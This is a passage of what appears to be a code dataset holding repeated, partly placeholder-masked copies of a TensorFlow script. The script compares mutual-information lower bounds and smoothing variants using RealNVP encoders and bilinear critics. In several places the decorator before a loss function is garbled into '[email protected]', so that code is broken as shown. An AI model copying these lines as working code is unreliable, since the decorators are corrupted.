(batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, 